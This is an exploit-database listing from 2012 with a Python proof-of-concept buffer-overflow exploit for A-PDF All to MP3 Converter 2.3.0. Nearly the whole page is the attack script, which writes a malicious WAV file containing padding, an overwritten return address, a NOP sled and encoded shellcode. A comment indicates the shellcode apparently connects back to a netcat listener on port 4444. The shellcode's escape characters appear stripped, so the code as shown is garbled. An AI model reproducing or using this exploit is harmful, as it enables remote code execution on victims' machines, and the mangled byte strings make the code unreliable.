Home / exploitsPDF  

A-PDF All To MP3 Converter 2.3.0 Buffer Overflow

Posted on 14 November 2012

#!/usr/bin/python # Exploit Title: A-PDF All to MP3 Converter v.2.3.0 buffer overflow # Software Link: http://www.a-pdf.com/all-to-mp3/download.htm # Version: <= 2.3.0 # Tested on: Win7 German # Date: 12/11/2012 # Author: metacom #details: Open the app, drag the wav file, #nc ip 4444 filename = "crash.wav" junk = "x41" * 4128 buff = "x98x6Ex43x00" #00436E98 nops = "x90" * 50 shell = ("xbax91x02x94xecxdaxc8xd9x74x24xf4x5ex2bxc9xb1" "x56x83xeexfcx31x56x0fx03x56x9exe0x61x10x48x6d" "x89xe9x88x0ex03x0cxb9x1cx77x44xebx90xf3x08x07" "x5ax51xb9x9cx2ex7excex15x84x58xe1xa6x28x65xad" "x64x2ax19xacxb8x8cx20x7fxcdxcdx65x62x3dx9fx3e" "xe8xefx30x4axacx33x30x9cxbax0bx4ax99x7dxffxe0" "xa0xadxafx7fxeax55xc4xd8xcbx64x09x3bx37x2ex26" "x88xc3xb1xeexc0x2cx80xcex8fx12x2cxc3xcex53x8b" "x3bxa5xafxefxc6xbex6bx8dx1cx4ax6ex35xd7xecx4a" "xc7x34x6ax18xcbxf1xf8x46xc8x04x2cxfdxf4x8dxd3" "xd2x7cxd5xf7xf6x25x8ex96xafx83x61xa6xb0x6cxde" "x02xbax9fx0bx34xe1xf7xf8x0bx1ax08x96x1cx69x3a" "x39xb7xe5x76xb2x11xf1x79xe9xe6x6dx84x11x17xa7" "x43x45x47xdfx62xe5x0cx1fx8ax30x82x4fx24xeax63" "x20x84x5ax0cx2ax0bx85x2cx55xc1xb0x6ax9bx31x91" "x1cxdexc5x04x81x57x23x4cx29x3exfbxf8x8bx65x34" "x9fxf4x4fx68x08x63xc7x66x8ex8cxd8xacxbdx21x70" "x27x35x2ax45x56x4ax67xedx11x73xe0x67x4cx36x90" "x78x45xa0x31xeax02x30x3fx17x9dx67x68xe9xd4xed" "x84x50x4fx13x55x04xa8x97x82xf5x37x16x46x41x1c" "x08x9ex4ax18x7cx4ex1dxf6x2ax28xf7xb8x84xe2xa4" "x12x40x72x87xa4x16x7bxc2x52xf6xcaxbbx22x09xe2" "x2bxa3x72x1exccx4cxa9x9axfcx06xf3x8bx94xcex66" "x8exf8xf0x5dxcdx04x73x57xaexf2x6bx12xabxbfx2b" "xcfxc1xd0xd9xefx76xd0xcb") exploit = junk+buff+nops+shell textfile = open(filename,"w") textfile.write(exploit) textfile.close() print " [+] crash.wav File created successfully. :)"

 

TOP